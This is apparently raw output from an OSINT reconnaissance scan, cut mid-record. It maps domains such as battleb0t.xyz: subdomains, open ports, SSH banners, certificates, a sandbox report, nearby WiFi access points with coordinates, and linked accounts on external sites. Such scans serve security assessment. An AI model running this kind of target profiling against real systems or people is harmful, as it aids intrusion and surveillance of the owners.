["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", "www.test.pointlane.com", "www.shop.pointlane.com", "on.pointlane.com", "www.polygon.posadisad.com", "tsxwdq.easypanel.host", "www.posadisad.com", "www.gitlab.posadisad.com", "www.git.posadisad.com", "www.sitemaps.posadisad.com", "www.pointlane.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.49", "extended_service_name": "SSH", "observed_at": "2023-05-11T01:15:50.786715445Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "547dbd625a27506b11586280f4a822637523e4a0ab006b506caadd882fb07151", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "8oJhdPmy3h9TMJvWg4Uf9bFwsyMd8Wzn2vYjEAGHvAA=", "x": "+yukgG2Uj68iboVSBhBnXM3KU5F0vU7GhjX/PobpTIQ=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sh |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:37:F0:E0) | 39.0469, -77.4903 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | YouTube User2 (Category: video)
https://www.youtube.com/@baptistevauthey | baptistevauthey |
| 2023-05-12 02:54:16 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | oldfluid.battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2052 | 104.21.71.14 |
| 2023-05-12 02:54:18 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://pics.battleb0t.xyz/gallery.css |
| 2023-05-12 02:44:18 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Varnish | www.battleb0t.xyz |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.197): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EF:F5:78) | 41.8781, -87.6298 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.190): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:50 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 34.148.97.127:443 | 34.148.97.127 |
| 2023-05-12 02:53:48 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://urldefense.com/v3/__https:/luckycarrotapp.com/organization-b2__;!!FBg0PJ8GdnjP4Q!8c3hK7I-XFYCk7Nsu_a_9ZxOtOzs4BD4Qzz4xaaEEmIdhXPGsEafhFGfqwLPGWafWHCBltJqzsIwT7XW_a2-1-v3BYjmMONK6mxg0p8$', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f94_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f94_IESQMMUTEX_0_519"\n "IsoScope_f94_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3988"\n "IsoScope_f94_IESQMMUTEX_0_331"\n "IsoScope_f94_IE_EarlyTabStart_0xe00_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f94_ConnHashTable<3988>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.80.202.17:443"\n "172.66.43.26:443"\n "20.38.109.4:443"\n "104.16.187.65:443"\n "104.18.230.83:443"\n "185.199.109.153:443"\n "104.18.136.59:443"\n "157.240.22.25:443"\n "104.16.121.190:443"\n "77.88.21.119:443"\n "104.18.25.196:443"\n "104.17.99.172:443"\n "104.16.136.206:443"\n "74.125.137.156:443"\n "104.19.154.83:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.producthunt.com"\n "assets.calendly.com"\n "buttons.github.io"\n "connect.facebook.net"\n "js.hs-analytics.net"\n "js.hs-banner.com"\n "js.hs-scripts.com"\n "js.hsadspixel.net"\n "js.hsforms.net"\n "js.usemessages.com"\n "luckycarrot.blob.core.windows.net"\n "mc.yandex.com"\n "mc.yandex.ru"\n "stats.g.doubleclick.net"\n "track.hubspot.com"\n "urldefense.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta property="twitter:image" content="https://luckycarrotapp.com/images/carrot-logo1111.png">" (Indicator: "twitter")\n "<meta property="twitter:title" content="Peer to peer recognition" />" (Indicator: "twitter")\n "<meta property="twitter:description" content="The best way to recognize and reward employees for their hard work. Boost employee engagement and motivation with Lucky Carrot." />" (Indicator: "twitter")\n "<img height="1" width="1" src="https://www.facebook.com/tr?id=2186666338068573&ev=PageView&noscript=1" alt="facebook" />" (Indicator: "facebook.com")\n "<button class="button btn-fill-orange watch-video-btn video-modal" title="Watch a Video" data-video="https://www.youtube.com/embed/d4_e3pCgUW8?autoplay=1">" (Indicator: "youtube")\n "<a href="https://www.facebook.com/EmployeeEngagementPlatform/" target="_blank">" (Indicator: "facebook.com")\n "<a href="https://am.linkedin.com/company/luckycarrot" target="_blank">" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/channel/UCb0UW89RRlZK6jZQUT3SRHQ" target="_blank">" (Indicator: "youtube")\n "<img src="/images/newLandingPage/icons/social-icons/youtube-icon.svg" />" (Indicator: "youtube")\n "<a href="https://mobile.twitter.com/carrot_lucky" target="_blank">" (Indicator: "twitter")\n "<img src="/images/newLandingPage/icons/social-icons/twitter-icon.svg" />" (Indicator: "twitter")\n ""https://www.facebook.com/rewardsmadefunagain/"," (Indicator: "facebook.com")\n ""https://twitter.com/carrot_lucky"," (Indicator: "twitter")\n ""https://www.youtube.com/channel/UCb0UW89RRlZK6jZQUT3SRHQ"," (Indicator: "youtube")\n ""https://www.linkedin.com/company/13047360"" (Indicator: "linkedin.com")\n "<img height="1" width="1" style="display:none;" alt="" src="https://px.ads.linkedin.com/collect/?pid=1512212&fmt=gif" />" (Indicator: "linkedin.com")\n "{state:0,transportUrl:b,context:c,parent:Wk()},P(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ja+"&cx=c";Tr()&&(f+="&sign="+Jh.Xe);var g=Sh||ci?Sr(b,f):void 0;g||(g=Fo("https://","http://",Jh.ze+f));Qk().destination[a]={state:1,context:c,parent:Wk()};mc(g)}};function Ur(){if(Ok()){return!0}return!1};var Xr=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),Yr={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Zr={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Jv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,m){var n=a(),p=n.Lg,q=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Lg*h):Math.round(n.Pi),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=G.hidden?!1:.5<=Pi(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=lv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")\n "b,"vert.pix");break;case "PERCENT":qy(d.verticalThresholds,b,"vert.pct")}pv("sdl","init",!1)?pv("sdl","pending",!1)||I(function(){return ry()}):(nv("sdl","init",!0),nv("sdl","pending",!0),I(function(){ry();if(sy()){var e=ty();qc(z,"scroll",e);qc(z,"resize",e)}else nv("sdl","init",!1)}));return b}xy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),yy=["www.youtube.com","www.youtube-nocookie.com"],zy,Ay=!1;" (Indicator: "youtube")\n "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gg:d,Eg:e,Fg:f,lh:g,mh:h,Wd:m,ib:b},p=z.YT,q=function(){Gy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=G.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Jy(w,"iframe_api")||Jy(w,"player_api"))return b}for(var x=G.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Ay&&Hy(x[A],n.Wd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"golden-kitty-badge_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "lucky%20carrot%20logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "bring-visibility_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mini-teams-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "message-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "build-a-recognition-culture_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "promote-core-values_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mail_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mini-slack-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "instagram-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "min-jira-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "rewards-as-experiences_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "twitter-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "youtube-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "linkedin-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "facebook-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "min-zoom-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "video-play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Icon-feather-check-orange_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39' | 185.199.109.153 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | imgur (Category: images)
https://imgur.com/user/Altpapier/about | Altpapier |
| 2023-05-12 02:44:27 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:56:92:fa:17:84:ee:f0:d0:57:46:44:1b:c0:
a4:14:29:10:a1:ef:73:a4:e7:64:f7:b5:e7:3f:b3:
66:76:75:96:94:eb:49:c3:b4:7b:98:99:f2:0f:53:
8b:0d:5d:a1:7d:07:f5:ec:33:33:f7:d8:24:d7:52:
d5:12:6d:a1:1f:e4:a6:4e:04:dc:3d:ec:3d:be:c0:
68:52:81:bd:0e:b0:f2:dc:e9:9e:c3:80:ab:29:55:
f9:1e:e7:5b:91:26:2d:a5:23:af:31:21:a7:26:77:
4d:22:98:0f:3c:48:92:7d:11:24:a2:2a:0b:37:5b:
b7:75:5d:9c:47:56:23:11:ea:1f:65:df:5a:99:2d:
b1:7c:34:88:13:dd:65:4f:a0:08:9d:d3:51:25:a6:
78:33:43:63:15:48:98:b7:c9:2d:ff:76:3d:7c:7e:
de:53:44:95:89:fa:a0:73:8e:18:62:72:8d:27:49:
aa:9c:1f:aa:7b:22:63:3f:e5:47:2d:46:e9:11:a7:
d9:be:31:17:58:ae:26:cb:94:ea:b8:74:2e:d5:e8:
97:bd:26:29:ad:75:15:d7:0b:3c:87:ec:7d:26:04:
ba:6b:7d:a6:11:27:4a:69:b1:b7:ca:99:b8:9d:ff:
7b:56:12:82:6a:1b:ca:28:1f:06:65:69:79:cd:93:
18:d1:f0:f1:97:01:54:01:52:f9:a4:bc:b1:5f:7f:
07:cd:e4:2b:75:9a:b4:04:a5:b3:96:5c:fa:5f:34:
4a:10:9c:af:38:59:33:75:87:74:42:bf:9b:c5:16:
68:7e:6e:ef:bf:b4:49:f4:b3:b2:df:03:0b:41:57:
bd:9d:b3:e1:0a:ab:4d:b6:f0:4f:0a:55:ab:67:0d:
47:01:8e:e0:df:09:34:38:59:4b:e4:b2:f9:93:a9:
14:cd:7f:e8:59:e4:10:fd:c1:6c:48:fa:be:99:2c:
29:f5:4b:bb:ec:4a:d6:b7:12:55:98:93:98:eb:47:
5c:a0:a4:28:64:3b:23:a2:ef:82:47:19:63:8d:bd:
5b:18:22:cf:f0:62:27:bf:ee:4a:28:c1:7c:e2:7b:
78:12:dd:d5:e8:7d:85:3e:1e:0f:49:a2:f3:4c:aa:
0d:2d:cc:58:f9:3e:e7:38:d6:30:4c:04:5a:18:cf:
9c:92:c9:94:e0:25:8d:f8:47:4e:48:b9:1f:15:b5:
e5:de:4b:35:84:12:32:49:2b:fa:a7:68:2a:1b:83:
d8:7f:e6:d9:7f:ca:74:5f:b4:c9:a0:67:b2:29:ff:
a2:1e:11:be:bc:99:7a:fb:44:7b:a4:fe:9c:6b:8f:
e3:20:e4:b7:4f:84:65:a3:c1:39:7b:b5:4f:1d:d0:
69:a0:23
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : May 4 20:22:49.987 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:49:5B:22:9A:37:74:EC:B5:6B:BF:74:25:
03:BF:46:DC:18:51:D6:44:11:7B:BF:B6:5B:50:DD:1C:
8F:80:EF:3B:02:20:47:2A:69:10:84:9E:DC:B5:E3:E3:
85:D7:64:E9:81:E6:34:A8:3A:EE:7B:C1:B6:5E:40:1F:
80:29:DA:11:05:13
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : May 4 20:22:50.005 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:35:7C:BF:0E:AA:9D:74:86:07:D7:D4:AB:
F5:E1:40:37:B8:BB:7E:DB:39:8A:BE:E2:5C:03:30:30:
87:33:6B:95:02:20:09:90:FF:C6:9A:73:8C:96:C5:27:
7D:6B:43:B6:38:71:2C:A6:63:43:70:C3:FA:5D:5B:71:
98:69:EE:13:00:4E
Signature Algorithm: sha256WithRSAEncryption
85:ff:2d:f7:ea:a0:91:b7:ce:aa:d9:bb:80:7c:e2:3c:82:5e:
aa:e4:8e:68:39:36:38:9c:77:b6:ea:24:b5:71:a4:68:73:d2:
cb:e4:b6:6e:87:92:cd:60:f0:4b:fa:16:3c:67:67:24:50:45:
a7:67:96:84:cc:d3:58:c6:5e:dc:44:85:ed:d6:81:ec:7f:49:
41:4d:c5:ca:ca:aa:32:ad:d7:11:f7:39:7b:b0:7b:77:74:44:
f7:cb:92:93:e4:45:e9:c1:4b:22:0e:6a:87:26:da:2f:86:c9:
2f:7d:8a:b8:0e:fa:c8:7d:05:d7:2e:5e:0f:61:c0:b7:f9:d9:
51:31:63:4f:68:5d:de:cc:22:12:04:48:9b:ee:41:d8:a5:b1:
3c:80:9c:7b:d1:ae:a7:5b:ac:bf:bc:03:e4:36:bf:0d:18:f2:
3c:c8:4d:81:d8:71:4f:93:f8:89:4f:b8:cc:c6:d5:23:b9:6b:
01:1a:ea:aa:63:1c:40:bd:2f:59:0a:34:b7:be:8a:f1:7e:27:
85:d0:0e:96:7f:f0:0b:eb:18:35:77:95:6b:27:bf:9c:18:72:
58:89:63:0e:ed:84:1b:cb:e1:47:d4:7e:b0:01:ca:b1:c2:f0:
7c:b9:e4:20:fc:db:bd:c2:a6:6c:47:1a:fc:14:e6:86:84:df:
57:0b:c2:0b
|
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01010101lzy.github.io | 185.199.111.153 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.123): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:36:51 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | Medellin, Colombia | 188.114.97.1 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 6566 1651 (Net ID: 00:00:C5:D7:63:6C) | 34.0544, -118.244 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WaveLAN Network VHome2B (Net ID: 00:02:2D:03:03:11) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MDD (Net ID: 00:02:2D:21:9D:34) | 37.7642, -122.3993 |
| 2023-05-12 03:11:21 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 50.1188, 8.6843 | 46.101.229.70 |
| 2023-05-12 02:44:22 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:97:4b:9a:94:33:ae:7c:5e:91:1b:d8:54:22:c9:
ed:4f:8d:dc:1c:ea:82:e7:c1:66:b8:0e:7a:d7:69:
7e:97:11:2c:1a:a5:0e:64:16:12:d5:94:b3:23:f2:
36:d4:4f:eb:d5:32:50:ac:e4:d7:66:1b:e3:da:91:
79:04:66:f4:2d:fa:3e:45:f4:48:91:1a:8d:80:82:
ca:dd:66:18:cd:f2:9d:87:0d:96:09:36:f0:90:50:
74:b3:8f:d1:d4:ab:e5:3c:ba:a6:ad:57:62:22:2b:
60:de:6e:76:04:02:5d:fa:52:80:b7:61:6b:ca:89:
0e:51:38:c3:f2:4d:c1:8f:3e:5c:2f:86:ec:7a:ee:
c4:a9:09:67:fe:3a:36:2c:f4:71:dd:63:52:c7:7e:
24:13:3b:f8:64:ac:0f:17:65:8b:4f:12:db:ba:8b:
96:d7:a7:d3:5c:fd:8f:e9:26:b0:c1:d3:ce:ae:a4:
80:9b:8d:9b:1f:f6:ca:4a:88:4f:be:ed:28:2f:45:
12:8d:ed:28:4a:e1:d7:0a:d1:cc:4f:38:0f:fa:93:
2d:8d:4a:92:3a:88:82:01:24:a7:62:52:95:88:cb:
f5:21:eb:4e:1f:14:59:fb:a0:f3:53:6c:6e:20:e1:
ca:0b:83:46:36:34:c6:22:17:1b:d8:e6:82:24:68:
ca:65
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:05:12.050 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:25:A0:69:FB:7F:3E:63:7D:A0:82:F0:BD:
99:FA:FF:84:20:AF:C5:86:81:24:4B:F7:CB:AB:FB:5E:
BD:6B:87:56:02:21:00:8A:56:44:28:2B:0B:E5:D6:3A:
F4:15:7E:0A:3C:BA:80:47:38:D3:13:65:D6:8E:A8:E5:
01:04:D3:ED:D7:28:24
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 24 04:05:12.068 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:48:50:77:27:A7:8D:E9:4E:44:5B:E4:B4:
56:50:FB:20:FC:C8:FD:0F:4B:DC:68:08:A4:56:A5:4B:
F5:A5:47:B3:02:20:41:B4:A0:0F:22:1C:69:E8:F3:FB:
60:B2:81:61:62:E0:DD:28:37:13:7E:74:2B:26:74:E1:
FD:E5:4D:29:61:E7
Signature Algorithm: sha256WithRSAEncryption
61:b4:ef:73:fc:3c:d6:36:f5:75:80:0c:33:8b:9a:05:0b:c4:
